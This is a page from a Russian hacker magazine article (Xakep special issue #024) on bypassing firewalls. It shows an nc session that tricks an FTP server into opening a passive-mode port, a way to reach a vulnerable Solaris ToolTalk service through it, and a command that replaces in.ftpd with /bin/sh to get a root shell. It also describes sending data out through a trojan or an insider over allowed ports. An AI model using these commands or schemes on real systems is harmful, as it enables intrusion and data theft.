Хакер №024. Спецвыпуск
АТАКА проходим сквозь фаерволл
GREEN (green@rootshell.ru)
Спецвыпуск Xakep, номер #024, стр. 024-018-4
# /sbin/ifconfig eth0 mtu 100
# nc -vvv 172.16.0.2 21
(UNKNOWN) [172.16.0.2] 21 (?) open
220 sol FTP server (SunOS 5.6) ready.
227 (172,16,0,2,128,7)
500 '
[1]+ Stopped nc -vvv 172.16.0.2 21
В этот момент мы можем соединиться сервером по порту 32775 (128*258+7), в случае, если на той стороне установлен Solaris 2.6, на этом порту сидит дырявый ToolTalk сервис, который мы теперь можем поиметь.
Некоторые реализации фаерволла позволяют передавать данные по такому открытому порту только в одном направлении - к серверу, так что для окончательного успеха нам нужен такой ToolTalk, который выполнит, например, такие операции:
"cp /usr/sbin/in.ftpd /tmp/in.ftpd.back ; rm -f /usr/sbin/in.ftpd ; cp /bin/sh /usr/sbin/in.ftpd".
В результате следующее соединение к этому серверу по 21-му порту даст нам root shell.
ПЕРЕДАЧА ИНФОРМАЦИИ ИЗНУТРИ
Теперь посмотрим, как можно передать инфу изнутри сети, прикрытой фаерволлом. Естественно, для этого нужно иметь помощника - например, трояна или живого человека, готового продать информацию изнутри, но не готового носить внутрь дискетки/винты (например, из-за строгого пропускного режима).
В самом простом случае все исходящие соединения, сделанные с внутренних машин наружу, будут работать. В таком случае информацию можно просто переслать. В случае с трояном - он установит соединение наружу, по которому ему будут передавать команды, что делать дальше, например, установить еще одно соединение и все данные из него перенаправить для выполнения cmd.exe (или другим локальным шеллом, если троян не для windows).
В чуть более сложном случае - исходящие соединения будут разрешены только на определенные порты (например, 80-й - для http); этот случай почти так же тривиален, как и предыдущий. Всего лишь нужно заставить троян соединяться с твоим серваком по 80-му порту. Ну, или человеку передавать данные на 80-й порт. В общем, если из внутренней сети есть доступ в Internet и внутри есть помощник - информацию утаить невозможно.
Назад на стр. 024-018-3 Содержание Вперед на стр. 024-018-5